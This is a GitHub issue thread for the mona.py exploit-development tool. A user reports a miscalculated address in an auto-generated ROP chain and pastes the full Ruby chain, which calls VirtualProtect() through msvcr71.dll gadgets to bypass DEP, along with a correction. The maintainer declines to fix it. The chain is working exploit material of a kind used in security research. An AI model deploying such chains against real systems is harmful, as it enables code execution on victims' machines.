search

corelan / mona

Corelan Repository for mona.py
BSD 3-Clause "New" or "Revised" License
1.7k stars 565 forks source link

Wrong Calculation of ROP chain #2

Closed gadin closed 8 years ago

gadin commented 9 years ago

Hi,

I used the latest version of Mona.py and had a bug when calculating the return address to virtualprotect , it forgot to calculate an add al,0EFh that will ocour before the virtual protect call.

Thanks for the helpful tool though, Gadi

ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :

* [ Ruby ] *

def create_rop_chain()

# rop chain generated with mona.py - www.corelan.be
rop_gadgets = 
[
  0x7c373fda,  # POP EBP # RETN [msvcr71.dll] 
  0x7c373fda,  # skip 4 bytes [msvcr71.dll]
  0x7c376747,  # POP EAX # RETN [msvcr71.dll] 
  0xfffffdff,  # Value to negate, will become 0x00000201
  0x7c352155,  # NEG EAX # RETN [msvcr71.dll] 
  0x7c341748,  # POP EBX # RETN [msvcr71.dll] 
  0xffffffff,  #  
  0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll] 
  0x7c363cff,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] 
  0x7c344f8e,  # POP EDX # RETN [msvcr71.dll] 
  0xffffffc0,  # Value to negate, will become 0x00000040
  0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll] 
  0x7c34f7a0,  # POP ECX # RETN [msvcr71.dll] 
  0x7c38fd9f,  # &Writable location [msvcr71.dll]
  0x7c342953,  # POP EDI # RETN [msvcr71.dll] 
  0x7c34d202,  # RETN (ROP NOP) [msvcr71.dll]
  0x7c36374d,  # POP ESI # RETN [msvcr71.dll] 
  0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
  0x7c34728e,  # POP EAX # RETN [msvcr71.dll] 
  0x7c37a140,  # ptr to &VirtualProtect() [IAT msvcr71.dll]   ---- BUG Error should be 7c37a151  ( will get eax to 0x7c37a140 when  add     al,0EFh; )
  0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 
  0x7c345c30,  # ptr to 'push esp # ret ' [msvcr71.dll]
].flatten.pack("V*")

MOna version :

$Revision: 545 $ $Id: mona.py 545 2014-02-22 22:46:02Z corelanc0d3r $ """

VERSION = '2.0' REV = filter(str.isdigit, '$Revision: 545 $') IMM = '1.8' DEBUGGERAPP = '' arch = 32 win7mode = False

corelanc0d3r commented 9 years ago

correct, this is a known issue... although trivial to spot & fix manually, I'll add this to my to do list

corelanc0d3r commented 8 years ago

decided not to fix this issue (as other corner cases can exist) - the way the code is written in mona.py would make it quite complex to fix... the good news is that it's very easy to fix manually. mona.py is not perfect, but it will put you on the right track :)